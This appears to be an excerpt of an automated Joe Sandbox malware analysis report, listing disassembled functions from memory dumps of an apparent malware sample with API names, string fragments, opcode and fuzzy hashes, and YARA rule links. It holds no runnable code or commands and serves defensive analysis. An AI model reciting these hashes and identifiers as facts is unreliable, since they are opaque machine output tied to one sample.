                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction ID: 42ac01cb531c62916f6067e3dc724ddba295e35a24648d9a8f779a66a45ab108
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA51A07A5006C09EFB68AF16D44835877AAF356B84F1CC115DA8887BD6DB3AEA70C701
                                                                                                                                                                                                                                                Function 000002616F592F18 Relevance: 6.3, APIs: 5, Instructions: 93memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                                                • Opcode ID: 787e2ccd3a4a2f0807cc7fcfab9808ef1bc99af934d1353d068844bd3f29b985
                                                                                                                                                                                                                                                • Instruction ID: 18fd136f73e5ee11ae86ce9cba98b9f9dd979a766c23490a43d9604cb067528c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 787e2ccd3a4a2f0807cc7fcfab9808ef1bc99af934d1353d068844bd3f29b985
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4131C539701B918AEB19DF16E54976A67AAFB45B80F0CC020DF4847B55EF36E876C340
                                                                                                                                                                                                                                                Function 000002616F5A25C8 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                                                • Opcode ID: ef5328ec8df5305a5bebb05340c2e4b6dc17e77d604934f64985ec379b581ae8
                                                                                                                                                                                                                                                • Instruction ID: bc5f4a80b2b915d423852bfb39c7d07492d68433baf792ea3890f6095e3a2232
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef5328ec8df5305a5bebb05340c2e4b6dc17e77d604934f64985ec379b581ae8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CD1F336704B808DE721CF7AD4483AC37BAF345B98F488216DE5D97B99DA35D86AC340
                                                                                                                                                                                                                                                Function 000002616F5A2EF0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                                                • Opcode ID: 43d1806d22cf26bb578584b1f50928cd79f72239213f1d2f409b9d03dcc02cf4
                                                                                                                                                                                                                                                • Instruction ID: abe44c11d89acf501ce2e136b7fe4d0fd85f96173926fd6fc08d258e6333b468
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43d1806d22cf26bb578584b1f50928cd79f72239213f1d2f409b9d03dcc02cf4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF91D23A7007508DF7519F65D84A3AD6BAAB345B8CF1C8109EE0A57A94DB37DCBAC700
                                                                                                                                                                                                                                                Function 000002616F592544 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileType
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3081899298-91387939
                                                                                                                                                                                                                                                • Opcode ID: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
                                                                                                                                                                                                                                                • Instruction ID: 9963c053b1c4b88a27fa3a37d87b281491da73c656fad487628ff45ef404ef8d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7971813E2007C189EB6CDF25D8583AA67AEF387784F49801ADD1953F99DE36DD258700
                                                                                                                                                                                                                                                Function 000002616F307980 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599175099.000002616F300000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002616F300000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f300000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 3242871069-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction ID: 66f798383c0f261320bcfdaa8d8771805ce11f3b1ecbcc944cfb9a7588e798f1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB51F63A312640CEEB54CF19E44CB6D77ABF744B98F188122EE4647788DB7AE961C701
                                                                                                                                                                                                                                                Function 000002616F30A3C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599175099.000002616F300000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002616F300000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f300000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3163161869-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction ID: ad6545dae61ee8842558d3f88f926a0feefd31a9fa4c7a7b39cb32280d527214
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E261B076508BC48AEB60CF15F44479EB7A5F789B94F084216EBC943B99DB39E1A0CB01
                                                                                                                                                                                                                                                Function 000002616F592338 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileType
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3081899298-91387939
                                                                                                                                                                                                                                                • Opcode ID: ee842ef1b9af794ce5f9c57276e32575cf678b56a57e7c1674317c9bf9c17d00
                                                                                                                                                                                                                                                • Instruction ID: bd71ab84907782eb694c03c37a9fbf36f4bf9213f6d75cc481459eedd77431d5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee842ef1b9af794ce5f9c57276e32575cf678b56a57e7c1674317c9bf9c17d00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1510A3A2047C089E6299E29E05C3AA679FF386750F8CC025DE4D43B99DA3BEC258740
                                                                                                                                                                                                                                                Function 000002616F5A2C60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                • Opcode ID: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
                                                                                                                                                                                                                                                • Instruction ID: 74420c09c56df8043ae1e9197c2c74cf7ca10d412ad5fdff1338b45d8c183519
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32410B76314B808ADB20DF25F8493A977A5F388784F488021EE4E87754EF3DD865C750
                                                                                                                                                                                                                                                Function 000002616F598A58 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                • Opcode ID: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
                                                                                                                                                                                                                                                • Instruction ID: c7639cc15ea8e8831390283e97a9ff838e661b2039d858bda659158deff423fc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47116D36209B8082EB648F15F40425977E9F789B94F5C8221EF8D07768EF3DC965CB00
                                                                                                                                                                                                                                                Function 000002616F591BFC Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                                                • Opcode ID: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
                                                                                                                                                                                                                                                • Instruction ID: c87d3dd8ddabf890f4505f800cc9132724725d80eebd616b83e7e354a4ed5b97
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D119839601B9489EB05DB56E40822977AAF78AFC0F1C8024DE4D43765DF35E862C300
                                                                                                                                                                                                                                                Function 000002616F591268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1617791916-0
                                                                                                                                                                                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                                                                                • Instruction ID: e91848b8311e3cd457e28bde7e57ffb65e00dc88e7dd92c0b69f86ed6eeea488
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42E06D3D6017048AEB058F66D80C34A3AE6FB8AF06F08C024CD0907351DF7E98BAC750

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 00007FFAAC591485 Relevance: 3.9, Strings: 3, Instructions: 182COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 6$6$"r
                                                                                                                                                                                                                                                • API String ID: 0-987654822
                                                                                                                                                                                                                                                • Opcode ID: e765f713194e6d78a1db2c0cfc7cd3094b2ff5bf065d814df658bbe2717206e8
                                                                                                                                                                                                                                                • Instruction ID: e9a18d02c87f839e50d9fa8e3d70ee71ca76f7c05f88bb5a57cbee890d6383a4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e765f713194e6d78a1db2c0cfc7cd3094b2ff5bf065d814df658bbe2717206e8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C510861A4DA8A8FE794EB3C8459675BBD1FF59200F0581FAE08EC31A3DE199C44C781
                                                                                                                                                                                                                                                Function 00007FFAAC5981B6 Relevance: .5, Instructions: 477COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: aec73483d2e1c77995a38812f798a6de55e3f93655864619fa47f6dab57ec817
                                                                                                                                                                                                                                                • Instruction ID: dd05b2e32c1295295e55e8c97d9c62b623ead45cd6345d81fb15595f69a49f43
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aec73483d2e1c77995a38812f798a6de55e3f93655864619fa47f6dab57ec817
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0F19570909A8E8FEBA8DF28C8557E937E1FF55310F04826EE84DC7291DB39D9458B81
                                                                                                                                                                                                                                                Function 00007FFAAC598F62 Relevance: .5, Instructions: 463COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 74ec47f98f32fe86d967b723ca3ead349879042e54cfad5e68990f8b45ca8ea8
                                                                                                                                                                                                                                                • Instruction ID: c021c8792db43e293f808ec740979d33607b074572601093f231adbb7999e623
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 74ec47f98f32fe86d967b723ca3ead349879042e54cfad5e68990f8b45ca8ea8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9E1C570909A4E8FEB68DF28C8557E977E1FF55310F04826AE84EC7291CE79D9448BC2
                                                                                                                                                                                                                                                Function 00007FFAAC591F35 Relevance: 6.6, Strings: 5, Instructions: 312COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 0D$0D$0D$/$/
                                                                                                                                                                                                                                                • API String ID: 0-87410978
                                                                                                                                                                                                                                                • Opcode ID: d94d01c1b8aaa30acb27b1ccbb058575024479f24d5b30860e57a2700e3f6aab
                                                                                                                                                                                                                                                • Instruction ID: 2bf400d4632bcbb36ecf9c85a39a225ee22bb5aa57757b2c5da937300bcc420b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d94d01c1b8aaa30acb27b1ccbb058575024479f24d5b30860e57a2700e3f6aab
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3913462E58A4A4FF758E738C855AF96BD5EF95350B0045FAE00EC72D3DD2DA90A83C0
                                                                                                                                                                                                                                                Function 00007FFAAC594010 Relevance: 4.4, Strings: 3, Instructions: 601COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 0"$HB$r6
                                                                                                                                                                                                                                                • API String ID: 0-2729165795
                                                                                                                                                                                                                                                • Opcode ID: 8676201667af84c4f023d89b5074c671f0f8976e8547dead0d7cb1fcd03e285d
                                                                                                                                                                                                                                                • Instruction ID: abebe9749ee3c3f01fd26549306df4035f2757fee913d008fdbd9eaa65da44bb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8676201667af84c4f023d89b5074c671f0f8976e8547dead0d7cb1fcd03e285d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16814762E1DA4A8FF759D73C84596B86BD5EF99340F0445BAE04EC32D3DE289C0A87C1
                                                                                                                                                                                                                                                Function 00007FFAAC593490 Relevance: 4.0, Strings: 3, Instructions: 275COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 0"$HB$r6
                                                                                                                                                                                                                                                • API String ID: 0-2729165795
                                                                                                                                                                                                                                                • Opcode ID: 0cb7a651c15b64b2efb84bedf3484b764fd704b237543ec0513ea8c62ab57ae1
                                                                                                                                                                                                                                                • Instruction ID: 2848e1819d6bc0468ca187bb7d1712681baae4b2882c857a4bf6ff42af7b8987
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0cb7a651c15b64b2efb84bedf3484b764fd704b237543ec0513ea8c62ab57ae1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7811662E19A0A8FF798E73CC4466B967D5EF99350F0445B9E00FC32D2DE28AC4687C1
                                                                                                                                                                                                                                                Function 00007FFAAC5937ED Relevance: 2.8, Strings: 2, Instructions: 274COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: (0$r6
                                                                                                                                                                                                                                                • API String ID: 0-2762223451
                                                                                                                                                                                                                                                • Opcode ID: dee2fd0a0f48c9bc57ed6c332d2a96847c9667108879997cede789dd61923f47
                                                                                                                                                                                                                                                • Instruction ID: 88ce74d5a7fbd2e2db7aa50f2ad4289da24cb0cfd300354ca9c7413c8cc21776
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dee2fd0a0f48c9bc57ed6c332d2a96847c9667108879997cede789dd61923f47
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A71D671A5D91A8FF758EB2CD8596B977D5EF99310F0042BAE04EC3392DE29E80583C1
                                                                                                                                                                                                                                                Function 00007FFAAC5911F5 Relevance: 2.6, Strings: 2, Instructions: 76COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 8[$r6
                                                                                                                                                                                                                                                • API String ID: 0-1231241607
                                                                                                                                                                                                                                                • Opcode ID: 34ddd125d72ff5f2a26e5f718b9a74e40683fb2caf159bab29d3b5e33d085e6a
                                                                                                                                                                                                                                                • Instruction ID: f9733e5dff33ce47f51d78c341f67860e7855dbd575997dd4206cb5940997130
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34ddd125d72ff5f2a26e5f718b9a74e40683fb2caf159bab29d3b5e33d085e6a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11112622A4E6860FE345E7B8889A9F5BBE5DF9B21074841FAE08DC3193DD0D9C468391
                                                                                                                                                                                                                                                Function 00007FFAAC59A2AD Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: H
                                                                                                                                                                                                                                                • API String ID: 0-2852464175
                                                                                                                                                                                                                                                • Opcode ID: 93547941ae09c79461e18aa7fce2d5032ab98264ca0d23e45cf7638c5306cf54
                                                                                                                                                                                                                                                • Instruction ID: bc0066879f2309f6ab6ce33a97e2251e3f39aa17066b77d72d7af2770fbee3b9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93547941ae09c79461e18aa7fce2d5032ab98264ca0d23e45cf7638c5306cf54
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1813931A599598FEB58E738C499AF977E5EF49310F0441BAE00ED32D2CD2DEC468781
                                                                                                                                                                                                                                                Function 00007FFAAC594A90 Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 6
                                                                                                                                                                                                                                                • API String ID: 0-1452363761
